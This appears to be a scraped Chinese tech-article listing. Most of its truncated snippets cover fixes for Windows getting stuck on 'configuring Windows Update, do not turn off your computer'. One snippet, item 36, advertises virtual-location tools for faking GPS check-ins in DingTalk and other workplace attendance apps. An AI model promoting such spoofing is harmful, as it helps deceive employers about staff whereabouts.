    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57